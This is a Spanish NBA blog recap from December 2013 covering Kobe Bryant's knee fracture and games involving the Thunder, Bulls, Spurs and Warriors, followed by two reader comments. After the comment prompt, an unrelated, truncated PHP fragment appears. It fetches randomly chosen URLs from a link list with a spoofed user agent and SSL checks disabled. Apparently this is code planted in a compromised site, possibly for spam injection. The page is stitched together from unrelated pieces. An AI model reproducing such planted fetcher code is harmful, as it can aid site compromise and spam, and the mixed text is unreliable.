La Crónica: Alerta amarilla

20 de December de 2013 por TheDeerHunter

El bombazo estallaba anoche y la noticia corría como la pólvora por internet. Kobe Bryant estará 6 semanas de baja por una fractura en (aprendiendo inglés+medicina) “the lateral tibial plateau” de su rodilla izquierda. Lo que se suponía que había sido un susto en el partido ante Memphis era una lesión en toda regla y Kobe siguió jugando y ganando ese partido. Golpe tremendo para él tras la durísima recuperación de su tendón de Aquiles y también para los Lakers, con la plantilla de bases al completo diezmada por las lesiones. En ocasiones todo lo que puede salir mal sale mal.

La noticia oscurecía a priori el plano deportivo en una mini-jornada que terminó siendo bastante divertida contra pronóstico. Los Thunder sumaron su 13ª victoria en su inexpugnable Chesapeake pero los Bulls, también mirados por “el tuerto de las lesiones”, les plantaron cara como jabatos alrededor del pilar emocional que es Joakim Noah (95-107).

En Oakland vivimos una nueva “trastada” de Popovic. Visto lo mucho que le afectó la multa del año pasado volvió a dejar descansando en el banquillo a Duncan, Parker y Ginobili en un duelo de máximo interés televisivo como el de anoche. No sólo ganó con game winner de Tiago Splitter sinó que lo hizo dando todo el espectáculo del mundo ante unos Warriors que siempre dan juego (aunque últimamente en el sentido malo del término). Veremos si todo eso sirve para evitar que les afeen la conducta. Bellinelli, Mills, Leonard, Diaw… todos dieron una lección de lo que debe de ser un equipo. Los locales, por su parte, Curry, Lee y poco más (104-102).

PREMIOS

MVP: Majestuoso Kevin Durant. 32 puntos, 9 rebotes, 6 asistencias, 3 robos.

Rookie: Ninguna actuación estelar pero tanto Tony Snell como Steven Adams aportaron un buen trabajo en la intendencia de Bulls y Thunder.

Sorpresa: Extraordinaria actuación de Marco Bellinelli y Patty Mills. Ambos suelen estar preparados para cuando se les da minutos.

Decepción: Los Warriors colectivamente, señalando especialmente a dos hombres importantes como Harrison Barnes y Klay Thompson.

Esfuerzo en vano: Podéis elegir entre David Lee con 32 puntos, 13 rebotes, 2 asistencias y 1 robo; Stephen Curry con 30 puntos, 15 asistencias, 4 robos, o Joakim Noah con 23 puntos, 12 rebotes, 3 asistencias y una dosis de pundonor extraordinaria.

Comenta

2 comentarios a esta entrada

  1. Mamba_Blanca dice:
    #1

    Los LAL fichan a Kendall Marshal, yo creo que si le dan minutos, puede evolucionar muy bien. Además que la presion en Lakers se ha reducido a nada.

    Yo buscaba un traspaso con Gasol por gente mas joven y a Kobe no le metía prisa porque en cuanto se recupere, bigotitos lo va a poner a jugar 35 minutos y luego pasa lo que pasa

      Citar

  2. Denise dice:
    #2

    Tremendamente mal los Warriors, para mi el problema es la rotación de MarkJ ackson y los roles que está dando. Los titulares juegan muchisimo, los suplentes que son muy buenos parecen unos paquetes porque el entrenador ni le da minutos, ni confianza ni tiros, y al final resulta que es un equipo muy previsible basado en darle la bola a Curry ó Thompson en momentos claves sin involucrar al resto de jugadores.

    Como me encanta Leonard, que pedazo jugador atras y delante, si hubiesen tenido a un tipo así hace años con el Big 3 joven y no al guarro de Bowen quizas en vez de anillos en años impares habrían tenido una serie de unos cuantos anillos consecutivos.

    Ese contratazo firmado a Kobe por agradeciemiento no tenía sentido alguno y lo mejor que podrían hacer es traspasar de una vez a Gasol, dejarse llevar y aspirar a un Top 6 del Draft hasta que Kobe se retire y fichen a Durant.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>